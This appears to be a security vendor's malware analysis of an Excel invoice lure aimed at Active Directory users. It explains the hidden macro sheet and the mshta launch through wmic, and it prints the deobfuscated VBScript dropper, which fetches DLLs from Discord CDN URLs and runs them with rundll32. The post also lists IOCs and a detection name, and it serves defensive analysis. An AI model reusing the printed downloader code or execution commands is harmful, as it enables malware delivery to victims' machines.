Malicious Excel File Disguised as an Invoice, Possibly Targeting Companies

The ASEC analysis team has recently discovered a malicious Excel file disguised as an invoice. This file is being distributed as an e-mail attachment with the filename of Invoice-[number]_date.xlsb. The following is the malicious e-mail that is being distributed in Korea.

Figure 1. E-mail

Upon running the Excel file, editing is restricted, prompting users to click the image within the file (see figure below).

Figure 2. Excel file

As the macro is designated to this image, the user must click the image for the macro to be executed and perform malicious behaviors. Macro1 sheet is hidden, and numerous formulas are divided into different cells within the sheet (see figure 4).

Figure 3. Macro designated to the image

Figure 4. Hidden sheet

When the user clicks the image, the message shown in the figure below appears. The malicious behavior occurs upon the user clicking either the OK or close button.

Figure 5. Pop-up error message

The executed macro creates the excel.rtf file in the \%APPDATA%\Microsoft\Excel\XLSTART folder and executes the file using the wmic process call create ‘mshta \%APPDATA%\Microsoft\Excel\XLSTART\excel.rtf’ command.

Figure 6. Created excel.rtf file

The excel.rtf file is an html file with several annotations inserted, and it has a malicious VBScript in a form that users cannot easily recognize. The following is the script of unobfuscated excel.rtf file.

<!DOCTYPE html>
<html>
<head>
---omitted---
<script type="text/vbscript" LANGUAGE="VBScript" >
Set hRpLar = CreateObject("Wscript.Shell") 
fpCHuctA = Replace(hRpLar.expandenvironmentstrings("%LOGONSERVER%"), CHR(92), "") 
RBfOKtU = hRpLar.expandenvironmentstrings("%USERDOMAIN%") 
If LCase(fpCHuctA) <> LCase(RBfOKtU) Then 

For Each WvpdWK in Array("https://cdn.discordapp.com/attachments/899633354561970258/899633408437813278/8_GrooveAudio.dll" , "https://cdn.discordapp.com/attachments/899633354561970258/899633406822977536/7_docprop.dll" , "https://cdn.discordapp.com/attachments/899633354561970258/899633425420546098/5_System.dll")  
    Set UWXaoFp = CreateObject("Scripting.FileSystemObject")
    If Not UWXaoFp.FileExists("C:\\ProgramData\spprgrss.png") Then
---omitted---
         with FiTmVH 
            .type = 1
            .open
            .write djGHweg.responseBody 
            .savetofile "C:\\ProgramData\spprgrss.png", 2 
            .close  
        end with 
        With CreateObject("Wscript.Shell") 
            .Exec("wmic process call create " & Chr(34) & "rundll32.exe C:\\ProgramData\spprgrss.png BrandMe" & Chr(34))
        End With
---omitted---

A code that checks the variable value of %LOGONSERVER% and %USERDOMAIN% exists in this script. Because the value is the same for normal users, download does not start. It thus appears that the malware is targeting users with AD environment.

If the set values in %LOGONSERVER% and %USERDOMAIN% are different, additional malicious file is downloaded. The downloaded file is saved as spprgrss.png in ProgramData folder, and executes via wmic process call create “rundll32.exe C:\\ProgramData\spprgrss.png BrandMe”.

The following are download URLs that exist in the script.

  • hxxps://cdn.discordapp.com/attachments/899633354561970258/899633408437813278/8_GrooveAudio.dll
  • hxxps://cdn.discordapp.com/attachments/899633354561970258/899633406822977536/7_docprop.dll
  • hxxps://cdn.discordapp.com/attachments/899633354561970258/899633425420546098/5_System.dll

Because the URLs above do not work anymore, it is not possible to download additional files. But it is assumed that it downloads banking malware such as dridex.

In addition to the Excel files that contain VBA macro, Excel files that use formula macros as such are consistently being discovered. As always stated, users must refrain from executing email attachments from unknown users. Also, users should be careful not to automatically execute malicious macro included in the file.

AhnLab’s anti-malware product, V3, detects and blocks the malware using the alias below.

[File Detection]

  • Downloader/XLS.Generic

[IOC]

  • 8b645dcfa487c9146a9c5b08aeeeb230

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Categories:Malware Information

Tagged as:,

5 1 vote
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments